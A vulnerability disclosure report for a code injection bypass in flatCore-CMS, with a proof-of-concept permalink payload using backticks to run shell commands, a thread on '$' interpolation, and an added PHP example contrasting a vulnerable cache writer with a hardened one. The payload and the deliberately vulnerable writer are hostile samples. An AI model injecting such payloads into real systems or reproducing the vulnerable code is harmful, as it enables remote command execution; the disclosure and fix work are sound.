Code Injection in flatcore/flatcore-cms

Valid

Reported on Oct 11th 2021

Description

Bypass of remote code execution in https://github.com/flatCore/flatCore-CMS/issues/59

The following payload uses . for concatenation and ` to execute system commands.

Proof of Concept

  1. Insert the following as the Permalink value:
     lol".`whoami>pwned.txt`."
  2. Go to http://10.0.2.15/flatCore-CMS/content/cache/cache_lastedit.php to execute the payload, then check the filesystem for pwned.txt.

Impact

This vulnerability is capable of blind remote command execution as the admin user.

haxatron modified the report a year ago

haxatron
a year ago
Researcher

http://10.0.2.15/flatCore-CMS/content/cache/active_urls.php also works. Additionally, all other vulnerabilities reported work in the develop branch.

Patrick validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrick marked this as fixed with commit a2688a a year ago
Patrick has been awarded the fix bounty
This vulnerability will not receive a CVE
functions.php#L388-L399 has been validated
hi-unc1e
a year ago

Can we use ${} to execute a command? e.g.

lol".${reboot}."

hi-unc1e
a year ago

Sorry, I misunderstood the use, but I DO think that $ should be escaped as well.

haxatron
a year ago
Researcher

Agreed ^

$ can be used to inject existing PHP variables, which may lead to a bypass.

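As an added example (not flatCore-CMS code, and not the fix in commit a2688a): a hypothetical PHP cache writer that shows why escaping only the quote in a double-quoted literal leaves the `.`/backtick bypass from the report and the `$` interpolation concern raised in the thread, beside a hardened writer that emits the value with var_export() as a single-quoted literal, plus a check that the generated file holds nothing but that literal. The function and variable names (write_cache_vulnerable, write_cache_hardened, cache_literal_is_safe, $cache_permalink) and the file layout are assumptions.

```php
<?php
// Added example, not flatCore-CMS code: a hypothetical cache writer in the
// style of the bug class in this report (a user-controlled permalink written
// into a cached .php file). Function and variable names are hypothetical.

// VULNERABLE: the value lands inside a double-quoted PHP string. Escaping only
// the quote is not enough: a value such as  lol".`id`."  closes the literal and
// concatenates a backtick (shell) expression, and even without breaking out,
// "$var" interpolation evaluates existing PHP variables in the generated file,
// which is the point raised in the thread above.
function write_cache_vulnerable(string $file, string $permalink): void
{
    $escaped = str_replace('"', '\"', $permalink); // insufficient on its own
    file_put_contents($file, "<?php\n\$cache_permalink = \"$escaped\";\n");
}

// HARDENED: var_export() emits a single-quoted literal with backslashes and
// single quotes escaped. Single-quoted strings never interpolate $ or {$..},
// so ".", backticks and "$" inside the value stay inert text.
function write_cache_hardened(string $file, string $permalink): void
{
    // var_export() renders NUL bytes as a concatenation; reject them up front
    // so the output is always a single plain literal.
    if (strpos($permalink, "\0") !== false) {
        throw new InvalidArgumentException('permalink contains a NUL byte');
    }
    $literal = var_export($permalink, true);
    file_put_contents($file, "<?php\n\$cache_permalink = $literal;\n");
}

// Defensive check on a generated file: exactly one single-quoted literal
// (only \\ and \' escapes inside it) followed by ";" and nothing else.
function cache_literal_is_safe(string $php): bool
{
    $pattern = '/^<\?php\n\$cache_permalink = \'(?:[^\'\\\\]|\\\\.)*\';\n$/';
    return preg_match($pattern, $php) === 1;
}

// Constructed input in the style of the report's payload.
$value = 'lol".`whoami>pwned.txt`."';
$tmp   = sys_get_temp_dir() . '/cache_demo.php';
write_cache_hardened($tmp, $value);
echo cache_literal_is_safe(file_get_contents($tmp)) ? "literal is safe\n" : "UNSAFE\n";

// Round trip: including the hardened file yields the original string back
// and runs no command.
include $tmp;
echo $cache_permalink === $value ? "round trip ok\n" : "round trip MISMATCH\n";
unlink($tmp);
```

The vulnerable writer is defined only for comparison and is never called; the same check would also reject its output, since the double-quoted form does not match the single-quoted literal shape.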